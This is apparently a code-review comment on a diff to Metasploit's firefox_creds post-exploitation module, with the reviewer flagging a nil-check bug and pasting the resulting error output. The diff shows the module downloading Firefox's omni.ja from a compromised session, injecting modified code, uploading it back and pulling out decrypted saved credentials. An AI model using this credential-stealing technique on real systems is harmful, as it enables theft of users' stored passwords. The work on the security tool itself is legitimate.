modules/post/multi/gather/firefox_creds.rb

```diff
@@ -79,216 +81,291 @@ def run
+        omnija = read_file(@paths['ff'] + org_file)
+        if omnija.nil? or omnija.empty? or omnija =~ /No such file/i
+          print_error("Could not download: #{@paths['ff'] + org_file}")
+          print_error("Tip: Try swtiching to a meterpreter shell if possible (as its more reliable/stable when downloading)") if session.type != "meterpreter"
+          return
+        end
+
+        print_status("Saving #{org_file} to: #{tmp}")
+        file_local_write(tmp, omnija)
       end
-      # cross platform local tempdir, "/" should work on windows too
-      tmp = Dir::tmpdir + "/" + new_file
-      print_status("Writing #{org_file} to local file: #{tmp}")
-      file_local_write(tmp, omnija)
+
       res = nil
-      print_status("Extracting and modifying #{new_file}...")
+      print_status("Injecting into: #{tmp}")
       begin
-        # automatically commits the changes made to the zip archive when
-        # the block terminates
+        # Automatically commits the changes made to the zip archive when the block terminates
         Zip::File.open(tmp) do |zip_file|
-          res = modify_omnija(zip_file)
+          res = decrypt_modify_omnija(zip_file)
         end
       rescue Zip::Error => e
-        print_error("Error modifying #{new_file}")
+        print_error("Error modifying: #{tmp}")
         return
       end
       if res
-        print_status("Successfully modified #{new_file}")
+        vprint_good("Successfully modified: #{tmp}")
       else
-        print_error("Failed to patch method")
+        print_error("Failed to inject")
         return
       end
-      print_status("Uploading #{new_file} to #{@paths['ff']}")
-      print_warning("This takes some extra time") if @platform =~ /unix|osx/
-      if not upload_file(@paths['ff']+new_file, tmp)
-        print_error("Could not upload #{new_file}")
-        return
+
+      print_status("Uploading #{tmp} to: #{@paths['ff'] + new_file}")
+      print_warning("This may take some time...") if @platform =~ /unix|osx/
+      if session.type == "meterpreter"
+        session.fs.file.upload_file(@paths['ff'] + new_file, tmp)
+      else
+        if !upload_file(@paths['ff'] + new_file, tmp)
+          print_error("Could not upload: #{tmp}")
+          return
+        end
       end
 
-      return if not trigger_decrypt(org_file, new_file)
+      return if !decrypt_trigger_decrypt(org_file, new_file, temp_file)
 
-      download_creds
-    else
+      decrypt_download_creds
+    else  # Non DECRYPT
       paths = []
-      if @platform =~ /unix|osx/
-        paths = enum_users_unix
-      else # windows
-        grab_user_profiles().each do |user|
-          next if user['AppData'] == nil
-          dir = check_firefox(user['AppData'])
-          if dir
-          paths << dir
-          end
-        end
-      end
+      @platform =~ /unix|osx/ ? (paths = enum_users_unix) : (paths = enum_users_win)
 
-      if paths.nil?
+      if paths.empty?
```

Comment:
It should be ```if paths.nil? || paths.empty?``` otherwise you can trigger a null pointer dereference and exception will be raised:

```
msf post(firefox_creds) > run

[*] Determining session platform and type
[-] Session 8 is not responding
[-] Post failed: NoMethodError undefined method `empty?' for nil:NilClass
[-] Call stack:
[-]   /Users/jvazquez/Projects/Code/metasploit-framework/modules/post/multi/gather/firefox_creds.rb:181:in `run'
[*] Post module execution completed
msf post(firefox_creds) >
```